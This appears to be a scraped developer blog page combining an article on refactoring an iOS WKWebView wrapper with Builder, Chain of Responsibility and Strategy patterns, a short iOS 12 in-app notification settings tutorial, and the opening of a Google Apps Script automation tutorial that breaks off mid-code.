+ let scriptMessageHandlers: [String: WKScriptMessageHandler]
+ // Override ViewController Title with Title obtained from WebView
+ let overrideTitleFromWebView: Bool
+
+ let url: URL
+
+ // ...
+}
+// ...
+extension OldWKWebViewController: WKNavigationDelegate {
+ // MARK - iOS WKWebView's navigationAction Delegate, used to determine how to handle the upcoming link
+ // Must call decisionHandler(.allow) or decisionHandler(.cancel) at the end
+ // decisionHandler(.cancel) will interrupt loading the upcoming page
+
+ // Different variables and switches have different logic processing here:
+
+ func webView(_ webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) {
+ guard let url = navigationAction.request.url else {
+ decisionHandler(.allow)
+ return
+ }
+
+ // Simulate business logic: WebViewController deeplinkCheck == true (indicating the need to check with DeepLinkManager and open the page)
+ if deeplinkCheck {
+ print("DeepLinkManager.open(\(url.absoluteString)")
+ // Simulate DeepLinkManager logic, open the URL if successful and end the process.
+ // if DeepLinkManager.open(url) == true {
+ decisionHandler(.cancel)
+ return
+ // }
+ }
+
+ // Simulate business logic: WebViewController isHomePage == true (indicating the homepage) & WebView is browsing the homepage, switch TabBar Index
+ if isHomePage {
+ if url.absoluteString == "https://zhgchg.li" {
+ print("Switch UITabBarController to Index 0")
+ decisionHandler(.cancel)
+ }
+ }
+
+ // Simulate business logic: WebViewController noNeedNativePresent == false (indicating the need to match special paths to open native pages)
+ if !noNeedNativePresent {
+ if url.pathComponents.count >= 3 {
+ if url.pathComponents[1] == "product" {
+ // match http://zhgchg.li/product/1234
+ let id = url.pathComponents[2]
+ print("Present ProductViewController(\(id)")
+ decisionHandler(.cancel)
+ } else if url.pathComponents[1] == "shop" {
+ // match http://zhgchg.li/shop/1234
+ let id = url.pathComponents[2]
+ print("Present ShopViewController(\(id)")
+ decisionHandler(.cancel)
+ }
+ // more...
+ }
+ }
+
+ decisionHandler(.allow)
+ }
+}
+// ...
+
navigationAction Delegate
controls the flow internally based on variables. If you need to delete or modify the flow or sequence, you have to modify the entire code, which may disrupt the originally normal flow.The Builder Pattern is a creational design pattern that separates the construction steps and logic of creating an object. The operator can set parameters step by step and reuse the settings, and finally create the target object. Additionally, the same construction steps can create different object implementations.
Using the example of making a Pizza in the image above, the steps of making a Pizza are broken down into several methods and declared in the PizzaBuilder
protocol (Interface). ConcretePizzaBuilder
is the actual object that makes the Pizza, which could be VegetarianPizzaBuilder
& MeatPizzaBuilder
; different builders may have different ingredients, but they all ultimately build()
to produce a Pizza
object.
In the WKWebView scenario, our final output object is MyWKWebViewConfiguration
. We consolidate all the variables that WKWebView
needs to set into this object and use the Builder Pattern MyWKWebViewConfigurator
to gradually complete the construction of the Configuration.
1
+2
+3
+4
+5
+6
+7
+8
+
public struct MyWKWebViewConfiguration {
+ let headNavigationHandler: NavigationActionHandler?
+ let scriptMessageStrategies: [ScriptMessageStrategy]
+ let userScripts: [WKUserScript]
+ let overrideTitleFromWebView: Bool
+ let url: URL
+}
+// All parameters are only exposed internally within the module
+
Since I only have the need to Build for MyWKWebView here, I did not further break down
MyWKWebViewConfigurator
into multiple Protocols (Interfaces).
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+
public final class MyWKWebViewConfigurator {
+
+ private var headNavigationHandler: NavigationActionHandler? = nil
+ private var overrideTitleFromWebView: Bool = true
+ private var disableZoom: Bool = false
+ private var scriptMessageStrategies: [ScriptMessageStrategy] = []
+
+ public init() {
+
+ }
+
+ // Encapsulate parameters, internal control
+ public func set(disableZoom: Bool) -> Self {
+ self.disableZoom = disableZoom
+ return self
+ }
+
+ public func set(overrideTitleFromWebView: Bool) -> Self {
+ self.overrideTitleFromWebView = overrideTitleFromWebView
+ return self
+ }
+
+ public func set(headNavigationHandler: NavigationActionHandler) -> Self {
+ self.headNavigationHandler = headNavigationHandler
+ return self
+ }
+
+ // Can encapsulate additional logic rules inside
+ public func add(scriptMessageStrategy: ScriptMessageStrategy) -> Self {
+ scriptMessageStrategies.removeAll(where: { type(of: $0).identifier == type(of: scriptMessageStrategy).identifier })
+ scriptMessageStrategies.append(scriptMessageStrategy)
+ return self
+ }
+
+ public func build(url: URL) -> MyWKWebViewConfiguration {
+ var userScripts:[WKUserScript] = []
+ // Attach only when generating
+ if disableZoom {
+ let script = "var meta = document.createElement('meta'); meta.name='viewport'; meta.content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no'; document.getElementsByTagName('head')[0].appendChild(meta);"
+ let disableZoomScript = WKUserScript(source: script, injectionTime: .atDocumentEnd, forMainFrameOnly: true)
+ userScripts.append(disableZoomScript)
+ }
+
+ return MyWKWebViewConfiguration(headNavigationHandler: headNavigationHandler, scriptMessageStrategies: scriptMessageStrategies, userScripts: userScripts, overrideTitleFromWebView: overrideTitleFromWebView, url: url)
+ }
+}
+
Adding an extra layer can also better control the usage permissions of Access Control for isolating parameters. In this scenario, we still want to be able to directly inject WKUserScript
into MyWKWebView
, but we don’t want to leave the door wide open for users to inject at will. Therefore, combining the Builder Pattern with Swift Access Control, after MyWKWebView
has been placed in a Module, MyWKWebViewConfigurator
encapsulates externally as an operation method func set(disableZoom: Bool)
, internally generating MyWKWebViewConfiguration
with attached WKUserScript
. All parameters of MyWKWebViewConfiguration
are immutable externally and can only be generated through MyWKWebViewConfigurator
.
Once we have the MyWKWebViewConfigurator
Builder, we can create a simple factory to encapsulate and reuse the construction steps.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+
struct MyWKWebViewConfiguratorFactory {
+ enum ForType {
+ case `default`
+ case productPage
+ case payment
+ }
+
+ static func make(for type: ForType) -> MyWKWebViewConfigurator {
+ switch type {
+ case .default:
+ return MyWKWebViewConfigurator()
+ .add(scriptMessageStrategy: PageScriptMessageStrategy())
+ .set(overrideTitleFromWebView: false)
+ .set(disableZoom: false)
+ case .productPage:
+ return Self.make(for: .default).set(disableZoom: true).set(overrideTitleFromWebView: true)
+ case .payment:
+ return MyWKWebViewConfigurator().set(headNavigationHandler: paymentNavigationActionHandler)
+ }
+ }
+}
+
The Chain of Responsibility Pattern belongs to the behavioral design pattern, encapsulating object handling operations and chaining them together in a linked structure. The request operation will be passed along the chain until it is handled; the chained encapsulated operations can be flexibly combined and the order changed.
The Chain of Responsibility focuses on whether you want to handle something that comes in, if not, then skip it, so it cannot handle halfway or modify the input object and pass it to the next; if this is the requirement, it is another Interceptor Pattern.
The diagram above uses Tech Support (or OnCall…) as an example. When a problem object comes in, it first goes through CustomerService
. If it cannot handle it, it is passed down to the next level, Supervisor
. If it still cannot handle it, it continues down to TechSupport
. Additionally, different responsibility chains can be formed for different issues. For example, if it is a problem from a major client, it will be handled directly from Supervisor
. In the Swift UIKit Responder Chain, the Chain of Responsibility pattern is also used to respond to user operations on the UI.
In our WKWebView scenario, it is mainly applied in the func webView(_ webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void)
delegate method.
When the system receives a URL request, it will go through this method for us to decide whether to allow the redirection, and call
decisionHandler(.allow)
ordecisionHandler(.cancel)
at the end to inform the result.
In the implementation of WKWebView, there will be many judgments or page handling that are different from others and need to be bypassed:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+
// Original implementation...
+func webView(_ webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) {
+ guard let url = navigationAction.request.url else {
+ decisionHandler(.allow)
+ return
+ }
+
+ // Simulated business logic: WebViewController deeplinkCheck == true (indicating the need to check and open the page through DeepLinkManager)
+ if deeplinkCheck {
+ print("DeepLinkManager.open(\(url.absoluteString)")
+ // Simulated DeepLinkManager logic, open the URL if successful and end the process.
+ // if DeepLinkManager.open(url) == true {
+ decisionHandler(.cancel)
+ return
+ // }
+ }
+
+ // Simulated business logic: WebViewController isHomePage == true (indicating the home page is open) & WebView is browsing the homepage, then switch TabBar Index
+ if isHomePage {
+ if url.absoluteString == "https://zhgchg.li" {
+ print("Switch UITabBarController to Index 0")
+ decisionHandler(.cancel)
+ }
+ }
+
+ // Simulated business logic: WebViewController noNeedNativePresent == false (indicating the need to match special paths to open native pages)
+ if !noNeedNativePresent {
+ if url.pathComponents.count >= 3 {
+ if url.pathComponents[1] == "product" {
+ // match http://zhgchg.li/product/1234
+ let id = url.pathComponents[2]
+ print("Present ProductViewController(\(id)")
+ decisionHandler(.cancel)
+ } else if url.pathComponents[1] == "shop" {
+ // match http://zhgchg.li/shop/1234
+ let id = url.pathComponents[2]
+ print("Present ShopViewController(\(id)")
+ decisionHandler(.cancel)
+ }
+ // more...
+ }
+ }
+
+ // more...
+ decisionHandler(.allow)
+}
+
As time goes by, the functionality becomes more and more complex, and the logic here will also become more and more. If the processing order is different, it will become a disaster.
Define the Handler Protocol first:
public protocol NavigationActionHandler: AnyObject {
+ var nextHandler: NavigationActionHandler? { get set }
+
+ /// Handles navigation actions for the web view. Returns true if the action was handled, otherwise false.
+ func handle(webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) -> Bool
+ /// Executes the navigation action policy decision. If the current handler does not handle it, the next handler in the chain will be executed.
+ func exeute(webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void)
+}
+
+public extension NavigationActionHandler {
+ func exeute(webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) {
+ if !handle(webView: webView, decidePolicyFor: navigationAction, decisionHandler: decisionHandler) {
+ self.nextHandler?.exeute(webView: webView, decidePolicyFor: navigationAction, decisionHandler: decisionHandler) ?? decisionHandler(.allow)
+ }
+ }
+}
+
func handle()
, returning true
if there is further processing, otherwise false
.func exeute()
is the default chain access implementation, which will traverse the entire operation chain from here. The default behavior is that when func handle()
returns false
(indicating that this node cannot handle it), it automatically calls the execute()
of the next nextHandler
to continue processing until the end.Implementation:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+
// Default implementation, usually placed at the end
+public final class DefaultNavigationActionHandler: NavigationActionHandler {
+ public var nextHandler: NavigationActionHandler?
+
+ public init() {
+
+ }
+
+ public func handle(webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) -> Bool {
+ decisionHandler(.allow)
+ return true
+ }
+}
+
+//
+final class PaymentNavigationActionHandler: NavigationActionHandler {
+ var nextHandler: NavigationActionHandler?
+
+ func handle(webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) -> Bool {
+ guard let url = navigationAction.request.url else {
+ return false
+ }
+
+ // Simulate business logic: Payment related, two-step verification WebView...etc
+ print("Present Payment Verify View Controller")
+ decisionHandler(.cancel)
+ return true
+ }
+}
+
+//
+final class DeeplinkManagerNavigationActionHandler: NavigationActionHandler {
+ var nextHandler: NavigationActionHandler?
+
+ func handle(webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) -> Bool {
+ guard let url = navigationAction.request.url else {
+ return false
+ }
+
+
+ // Simulate DeepLinkManager logic, open the URL if successful and end the process.
+ // if DeepLinkManager.open(url) == true {
+ decisionHandler(.cancel)
+ return true
+ // } else {
+ return false
+ //
+ }
+}
+
+// More...
+
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+
extension MyWKWebViewController: WKNavigationDelegate {
+ public func webView(_ webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) {
+ let headNavigationActionHandler = DeeplinkManagerNavigationActionHandler()
+ let defaultNavigationActionHandler = DefaultNavigationActionHandler()
+ let paymentNavigationActionHandler = PaymentNavigationActionHandler()
+
+ headNavigationActionHandler.nextHandler = paymentNavigationActionHandler
+ paymentNavigationActionHandler.nextHandler = defaultNavigationActionHandler
+
+ headNavigationActionHandler.exeute(webView: webView, decidePolicyFor: navigationAction, decisionHandler: decisionHandler)
+ }
+}
+
This way, when a request is received, it will be processed sequentially according to the handling chain we defined.
Combining the previous Builder Pattern MyWKWebViewConfigurator
by exposing headNavigationActionHandler
as a parameter allows external control over the processing requirements and order of this WKWebView:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+
extension MyWKWebViewController: WKNavigationDelegate {
+ public func webView(_ webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void) {
+ configuration.headNavigationHandler?.exeute(webView: webView, decidePolicyFor: navigationAction, decisionHandler: decisionHandler) ?? decisionHandler(.allow)
+ }
+}
+
+//...
+struct MyWKWebViewConfiguratorFactory {
+ enum ForType {
+ case `default`
+ case productPage
+ case payment
+ }
+
+ static func make(for type: ForType) -> MyWKWebViewConfigurator {
+ switch type {
+ case .default:
+ // Simulating default scenario with these handlers
+ let deplinkManagerNavigationActionHandler = DeeplinkManagerNavigationActionHandler()
+ let homePageTabSwitchNavigationActionHandler = HomePageTabSwitchNavigationActionHandler()
+ let nativeViewControllerNavigationActionHandlera = NativeViewControllerNavigationActionHandler()
+ let defaultNavigationActionHandler = DefaultNavigationActionHandler()
+
+ deplinkManagerNavigationActionHandler.nextHandler = homePageTabSwitchNavigationActionHandler
+ homePageTabSwitchNavigationActionHandler.nextHandler = nativeViewControllerNavigationActionHandlera
+ nativeViewControllerNavigationActionHandlera.nextHandler = defaultNavigationActionHandler
+
+ return MyWKWebViewConfigurator()
+ .add(scriptMessageStrategy: PageScriptMessageStrategy())
+ .add(scriptMessageStrategy: UserScriptMessageStrategy())
+ .set(headNavigationHandler: deplinkManagerNavigationActionHandler)
+ .set(overrideTitleFromWebView: false)
+ .set(disableZoom: false)
+ case .productPage:
+ return Self.make(for: .default).set(disableZoom: true).set(overrideTitleFromWebView: true)
+ case .payment:
+ // Simulating payment page with only these handlers, and paymentNavigationActionHandler having the highest priority
+ let paymentNavigationActionHandler = PaymentNavigationActionHandler()
+ let deplinkManagerNavigationActionHandler = DeeplinkManagerNavigationActionHandler()
+ let defaultNavigationActionHandler = DefaultNavigationActionHandler()
+
+ paymentNavigationActionHandler.nextHandler = deplinkManagerNavigationActionHandler
+ deplinkManagerNavigationActionHandler.nextHandler = defaultNavigationActionHandler
+
+ return MyWKWebViewConfigurator().set(headNavigationHandler: paymentNavigationActionHandler)
+ }
+ }
+}
+
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+
+
+
+
+> _The Strategy Pattern belongs to the **behavioral** design pattern, which abstracts the actual operation. We can implement various different operations, allowing flexibility to replace them according to different contexts._
+
+The above diagram illustrates different payment methods. We abstract the payment as a `Payment` Protocol (Interface), and then each payment method implements its own implementation. When using `PaymentContext` (simulating external usage), based on the user's selected payment method, the corresponding Payment entity is generated and `pay()` is called to process the payment.
+
+#### WKWebView Scenario
+
+> _Used in the interaction between WebView and frontend pages._
+
+> _When frontend JavaScript calls:_
+
+> _`window.webkit.messageHandlers.Name.postMessage(Parameters);`_
+
+> _It will go to WKWebView to find the corresponding `WKScriptMessageHandler` Class for `Name` and execute the operation._
+
+The system already has defined Protocol and the corresponding `func add(_ scriptMessageHandler: any WKScriptMessageHandler, name: String)` method. We just need to define our own `WKScriptMessageHandler` implementation and add it to WKWebView. The system will dispatch to the corresponding concrete strategy to execute based on the received `name` following the Strategy Pattern strategy.
+
+Here, we simply extend the Protocol with `WKScriptMessageHandler`, adding an `identifier: String` for `add(.. name:)` usage:
+
+
+
+```swift
+public protocol ScriptMessageStrategy: NSObject, WKScriptMessageHandler {
+ static var identifier: String { get }
+}
+
Implementation:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+
final class PageScriptMessageStrategy: NSObject, ScriptMessageStrategy {
+ static var identifier: String = "page"
+
+ func userContentController(_ userContentController: WKUserContentController, didReceive message: WKScriptMessage) {
+ // Simulating called from js: window.webkit.messageHandlers.page.postMessage("Close");
+ print("\(Self.identifier): \(message.body)")
+ }
+}
+
+//
+
+final class UserScriptMessageStrategy: NSObject, ScriptMessageStrategy {
+ static var identifier: String = "user"
+
+ func userContentController(_ userContentController: WKUserContentController, didReceive message: WKScriptMessage) {
+ // Simulating called from js: window.webkit.messageHandlers.user.postMessage("Hello");
+ print("\(Self.identifier): \(message.body)")
+ }
+}
+
WKWebView Registration:
1
+2
+3
+4
+
var scriptMessageStrategies: [ScriptMessageStrategy] = []
+scriptMessageStrategies.forEach { scriptMessageStrategy in
+ webView.configuration.userContentController.add(scriptMessageStrategy, name: type(of: scriptMessageStrategy).identifier)
+}
+
Combining the Builder Pattern from the previous MyWKWebViewConfigurator
to externally manage the registration of ScriptMessageStrategy
:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+
public final class MyWKWebViewConfigurator {
+ //...
+
+ // You can encapsulate the logic for adding rules inside
+ public func add(scriptMessageStrategy: ScriptMessageStrategy) -> Self {
+ // Here, only the old logic will be deleted first when implementing duplicate identifiers
+ scriptMessageStrategies.removeAll(where: { type(of: $0).identifier == type(of: scriptMessageStrategy).identifier })
+ scriptMessageStrategies.append(scriptMessageStrategy)
+ return self
+ }
+ //...
+}
+
+//...
+
+public class MyWKWebViewController: UIViewController {
+ //...
+ public override func viewDidLoad() {
+ super.viewDidLoad()
+
+ //...
+ configuration.scriptMessageStrategies.forEach { scriptMessageStrategy in
+ webView.configuration.userContentController.add(scriptMessageStrategy, name: type(of: scriptMessageStrategy).identifier)
+ }
+ //...
+ }
+}
+
At this point, some friends may wonder if the Strategy Pattern here can be replaced with the Chain of Responsibility Pattern.
Both of these design patterns are behavioral and can be replaced; however, the actual choice depends on the specific requirements. In this case, the Strategy Pattern is very typical, where WKWebView determines different strategies based on the Name. If our requirement involves chain dependencies between different strategies or recovery relationships, such as if AStrategy cannot handle it and needs to pass it to BStrategy, then we would consider using the Chain of Responsibility Pattern.
Strategy v.s. Chain of Responsibility
For complex scenarios, you can combine the Chain of Responsibility Pattern inside the Strategy Pattern to achieve the desired outcome.
MyWKWebViewConfiguratorFactory
-> Encapsulates the steps to generate MyWKWebViewConfigurator
MyWKWebViewConfigurator
-> Encapsulates MyWKWebViewConfiguration
parameters and construction stepsMyWKWebViewConfiguration
-> Used by MyWKWebViewController
MyWKWebViewController
’s func webView(_ webView: WKWebView, decidePolicyFor navigationAction: WKNavigationAction, decisionHandler: @escaping (WKNavigationActionPolicy) -> Void)
-> Calls headNavigationHandler?.execute(webView: webView, decidePolicyFor: navigationAction, decisionHandler: decisionHandler)
for chain execution handlingMyWKWebViewController
’s webView.configuration.userContentController.addUserScript(XXX)
dispatches the corresponding JS Caller to the respective handling strategy.If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Besides turning off notifications from the system, give users other options
We continue to improve push notifications, whether it’s existing technology or newly available features, let’s give them a try!
iOS ≥ 12 allows you to add a shortcut to your app’s notification settings page in the user’s “Settings,” giving users other options when they want to adjust notifications; they can jump to “in-app” instead of turning off notifications directly from the “system.” Here’s a preview:
Settings -> App -> Notifications -> In-App Settings
Additionally, when users receive notifications and want to use 3D Touch to adjust settings to “turn off” notifications, there will be an extra “In-App Settings” option for users to choose from.
Notifications -> 3D Touch -> … -> Turn Off… -> In-App Settings
The implementation is very simple. The first step is to request an additional .providesAppNotificationSettings permission when requesting push notification permissions.
1
+2
+3
+4
+5
+6
+7
+8
+
//appDelegate.swift didFinishLaunchingWithOptions or....
+if #available(iOS 12.0, *) {
+ let center = UNUserNotificationCenter.current()
+ let permissiones:UNAuthorizationOptions = [.badge, .alert, .sound, .provisional,.providesAppNotificationSettings]
+ center.requestAuthorization(options: permissiones) { (granted, error) in
+
+ }
+}
+
After asking the user whether to allow notifications, if notifications are enabled, an option will appear below ( regardless of whether the user previously allowed or disallowed notifications ).
The second step, and the final step; we need to make appDelegate conform to the UNUserNotificationCenterDelegate protocol and implement the userNotificationCenter(_ center: UNUserNotificationCenter, openSettingsFor notification: UNNotification?) method!
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+
//appDelegate.swift
+import UserNotifications
+@UIApplicationMain
+class AppDelegate: UIResponder, UIApplicationDelegate {
+ var window: UIWindow?
+ func application(_ application: UIApplication, didFinishLaunchingWithOptions launchOptions: [UIApplicationLaunchOptionsKey: Any]?) -> Bool {
+ if #available(iOS 10.0, *) {
+ UNUserNotificationCenter.current().delegate = self
+ }
+
+ return true
+ }
+ //Other parts omitted...
+}
+extension AppDelegate: UNUserNotificationCenterDelegate {
+ @available(iOS 10.0, *)
+ func userNotificationCenter(_ center: UNUserNotificationCenter, openSettingsFor notification: UNNotification?) {
+ //Navigate to your settings page..
+ //EX:
+ //let VC = SettingViewController();
+ //self.window?.rootViewController.present(alertController, animated: true)
+ }
+}
+
Completed! Compared to the previous articles, this feature implementation is very simple 🏆
This feature is somewhat similar to the one mentioned in the previous article, where we send low-interference silent push notifications to users without requiring their authorization to test the waters!
Both features aim to build a new bridge between developers and users. In the past, if an app was too noisy, we would mercilessly go to the settings page and turn off all notifications. However, this means that developers can no longer send any notifications, whether good or bad, useful or not, to the users. Consequently, users might miss important messages or exclusive offers.
This feature allows users to have the option to adjust notifications within the app when they want to turn them off. Developers can segment push notification items, allowing users to decide what type of push notifications they want to receive.
For the Wedding App, if users find the column notifications too intrusive, they can turn them off individually; but they can still receive important system messages.
p.s. The individual notification toggle feature is something our app already had, but by combining it with the new notification features in iOS ≥12, we can achieve better results and improve user experience.
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Implementing Robotic Process Automation for Google Workspace services using Google Apps Script
Photo by Possessed Photography
RPA (Robotic Process Automation) translates to “process automation robots” in Chinese. Looking back at human history, from hand-gathering to the Stone Age, then to agricultural civilization, from the industrial revolution of the last century to the information boom of the past 20 years, human work efficiency and productivity have grown exponentially. Along the way, RPA applications have been ubiquitous, such as waterwheels in the agricultural era (automated threshing work), textile machines in the industrial revolution (automated textile work), factory robotic arms (automated assembly work), and finally, the automated information-related work introduced in this article, such as automatic report queries, automatic notifications, and so on.
Embarrassingly, I only recently learned this term. Since my first job (7 years ago), I have been doing RPA-related work, such as writing crawlers to collect statistics, automating CI/CD processes, automating data queries, automating stability data alerts, and automating daily routine operations. However, I used to refer to it simply as “automation.” It’s time to give it a proper name — RPA (Robotic Process Automation).
Previously, my RPA efforts focused more on “writing code to automate tasks to solve single problems,” lacking comprehensive preliminary evaluation and analysis, the use of No/Low Code tools, regulations, operational monitoring, actual data statistics, continuous improvement, corporate culture promotion, and so on. These are all essential aspects of complete RPA. However, as mentioned earlier, I only recently learned about this professional field, so let me start with a practical article!
There are many platforms providing RPA services, such as Automation Anywhere, UiPath, Microsoft Power Automate, Blue Prism, or Zapier, IFTTT, Automate.io. You need to choose the appropriate service based on the actual problem you want to solve and the platform.
I recommend a free open-source browser-based RPA tool: Automa.
Broadly speaking, transforming the active dependence between people or between people and tasks into dependence on platforms is also a form of RPA.
For example: using project management tools like Asana/Jira to manage work tasks uniformly.
Based on the concept of transforming active to passive, we can also implement an RPA for services that originally required manual checks for new notifications, automatically notifying us when there are new changes.
For example: The previously implemented Gmail to Slack forwards specific notification emails to the work group.
Previously, in the “2021 Pinkoi Tech Career Talk — Unveiling the Secrets of a Highly Efficient Engineering Team”, we discussed the costs of small accumulations and interruptions in flow; assuming a routine repetitive task takes 15 minutes to solve each time, occurs 10 times a week, and wastes nearly 130 hours a year; if we also consider the cost of “context switching,” it could ultimately waste nearly 200 hours a year.
2021 Pinkoi Tech Career Talk — Unveiling the Secrets of a Highly Efficient Engineering Team
Context switching means that when we are highly focused on important tasks, we need to pause to handle other matters, and the time it takes to get back into the state after handling them.
The benefits evaluation of developing RPA can refer to the figure below. As long as the development time required and the frequency encountered are greater than the time wasted, it is worth investing resources to implement:
https://twitter.com/swyx/status/1196401158744502272
In addition to saving time, automated standardized processes can also reduce the chance of human error and improve stability.
With the rise of AI, RPA is also frequently mentioned; but I think RPA has no direct relationship with AI, RPA existed long before the era of AI, and the benefits of AI adoption in enterprises may not be as high as the benefits of perfecting RPA. RPA is more about corporate culture and work habits; however, it is undeniable that AI can indeed help RPA reach the next level. For example, RPA used to only handle precise, routine tasks, but with AI, it can handle some fuzzy, more dynamic, and intelligent judgment tasks.
Google Workspace (formerly G Suite) is our daily office collaboration partner. We use Gmail for email hosting, Google Docs for documents, Google Sheets for spreadsheets, Google Forms for forms, etc. The integration between these services or communication with internal and external systems requires us to implement RPA to complete.
However, Google does not provide direct RPA services, which can be achieved through the following services:
I haven’t used the No Code platform App Sheet, but I have quite a bit of experience with Cloud Functions and Google Apps Script. Here are some personal experiences and choices:
In summary, Cloud Functions are recommended when more comprehensive and complex RPA integration functions or more external API integration needs are required.
Previous cases using Cloud Functions include:
I use it when integrating with non-Google Workspace services and bridging other external services.
Previous cases using Google Apps Script include:
Due to execution time and API Request customization limitations, I only use Google Apps Script for simple and quick services; or when there is a need to integrate with Google services, I will prioritize using Google Apps Script (because using Cloud Functions requires implementing a complete Google service authentication process).
Finally, we come to the topic of this article, using Google Apps Script to achieve Google service RPA automation.
The product team needs to query Google Analytics data daily and fill it into the Google Sheet data report for team trend analysis; and publish the daily data content to the Dashboard screen so that all members can grasp the current situation.
Colleagues need to spend about 30 minutes to complete this task every day when they arrive at the company; if there are other things to deal with, they need to wait until this routine work is completed or delay the release of daily data messages.
Simple estimation of RPA benefits:
Therefore, we only need to invest one week of development time to solve the workload of the colleague responsible for data checking in the long run, allowing them to focus on more important tasks.
Our goal is to use Google Apps Script to create an RPA that automatically retrieves daily data from Google Analytics and internal system report APIs and fills it into Google Sheets, as well as setting up a Web UI Dashboard.
The data is fake, purely for demo use; from 2024/04/13 onwards, it will be particularly low or remain at 0 because my zhgchg.li GA really has “0” traffic Q_Q.
For the sake of explanation, the following code will be as less abstract as possible and more explanatory. You can modify it according to your actual needs.
A complete public Google Sheet & Google Apps Script is attached at the end of the article. If you are too lazy to follow step by step, you can directly modify the template provided at the end.
Simply select “Extensions” -> “Apps Script” on the report we want to automate to automatically create a Google Apps Script linked to the Google Sheet report.
Alternatively, you can directly create it from the Google Apps Script homepage Google Apps Script, but this will not link to the Google Sheet.
It is not necessary to link to operate the corresponding Google Sheet, both methods can be used. The difference lies in the ownership of the Script. If it is linked to the report, it belongs to the report owner; if created by yourself, it belongs to the creator. Ownership will affect whether the script will be invalidated or deleted if the account is deactivated due to resignation.
After creating the script, we can first rename our script project from the top.
Before moving on to the next step of writing the program, let’s supplement some basic knowledge of Google Apps Script.
About the Editor
The SDK for Google services is introduced by default (no special introduction is required to call and use):
.gs
files to store different object codes for better organization; all files will execute under the same Namespace and lifecycle, so be careful as object names and variable names may overwrite each other if duplicated. In addition to .gs
script files, you can also add .html
HTML Template files for rendering Web UI. (This will be introduced later)1ReeQ6WO8kKNxoaA_O0XEQ589cIrRvEBA9qcWpNqdOP17i47u6N9M5Xh0
Another point to note is indentation. In some browsers, pressing “Control + [” to indent will trigger the back page action, so be careful!
Google Apps Script GitHub Assistant Chrome Extension
Logger Message
You can use the following script with Debug to print Debug Logs in the Console.
1
+
Logger.log("Hi")
+
Execution Logs and Error Information
Logs or errors during execution in the editor will be displayed directly. To check execution logs or errors during automatic execution, go to the “Executions” tab.
Automatic Triggers
The “Triggers” tab allows you to set how methods in the script are automatically triggered. The automatic trigger conditions that can be set include:
Error notification settings can be configured to notify you when the script execution fails.
Grant Execution Permissions
The first execution/deployment or adding new services/resources will require re-authorization. Subsequent executions will use the authorized identity, so ensure that the authorized (usually current) account has the necessary permissions for the resources/services (e.g., Google Sheet permissions).
After the account selection pop-up appears, choose the account to authorize for execution (usually the current Google Apps Script account):
The message “Google hasn’t verified this app” appears because the app we are developing is for personal use and does not need to be verified by Google.
Simply click “Advanced” -> “Go to XXX (unsafe)” -> “Allow”:
After completing the authorization, you can successfully run the script. If there are no changes to the resources, re-authorization is not required.
After understanding the basic knowledge, we can write the program for the first function.
We create the following multiple files to store different objects:
DailyReportStyle.gs
field style object:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+
class HeaderStyle {
+ constructor() {
+ this.color = "#ffffff";
